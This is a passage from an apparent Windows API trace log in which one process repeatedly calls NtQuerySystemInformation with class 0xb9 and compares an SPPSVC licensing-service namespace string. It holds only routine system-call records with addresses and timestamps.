SystemInformation=0xa78207c900, Length=0x20, ResultLength=0x0) [0284.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x20, ResultLength=0x0) [0284.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0284.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0284.012] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0284.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0284.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0284.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0284.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0284.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0284.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0284.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0284.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0284.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0284.026] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0284.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0284.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0284.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0284.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0284.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0284.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0284.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0284.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x50, ResultLength=0x0) [0284.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x50, ResultLength=0x0) [0284.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x50, ResultLength=0x0) [0284.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x50, ResultLength=0x0) [0284.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x50, ResultLength=0x0) [0284.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x50, ResultLength=0x0) [0284.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x50, ResultLength=0x0) [0284.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8a0, Length=0x38, ResultLength=0x0) [0284.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6d0, Length=0x28, ResultLength=0x0) [0284.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6d0, Length=0x28, ResultLength=0x0) [0284.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6d0, Length=0x28, ResultLength=0x0) [0284.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6d0, Length=0x28, ResultLength=0x0) [0284.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c740, Length=0x28, ResultLength=0x0) [0284.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8a0, Length=0x38, ResultLength=0x0) [0284.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c7c0, Length=0x28, ResultLength=0x0) [0284.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c7c0, Length=0x28, ResultLength=0x0) [0284.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c660, Length=0x20, ResultLength=0x0) [0284.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c5e0, Length=0x20, ResultLength=0x0) [0284.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c5e0, Length=0x20, ResultLength=0x0) [0284.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c5e0, Length=0x20, ResultLength=0x0) [0284.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8a0, Length=0x38, ResultLength=0x0) [0284.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8a0, Length=0x38, ResultLength=0x0) [0284.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c720, Length=0x20, ResultLength=0x0) [0284.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6b0, Length=0x20, ResultLength=0x0) [0284.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6b0, Length=0x20, ResultLength=0x0) [0284.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0284.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0284.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0284.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0284.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0284.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0284.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0284.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0284.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0284.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0284.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0284.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c990, Length=0x28, ResultLength=0x0) [0284.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0284.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0284.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0284.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0284.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x20, ResultLength=0x0) [0284.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0284.066] NtQuerySystemInformation (SystemInformationClass=0xb9, 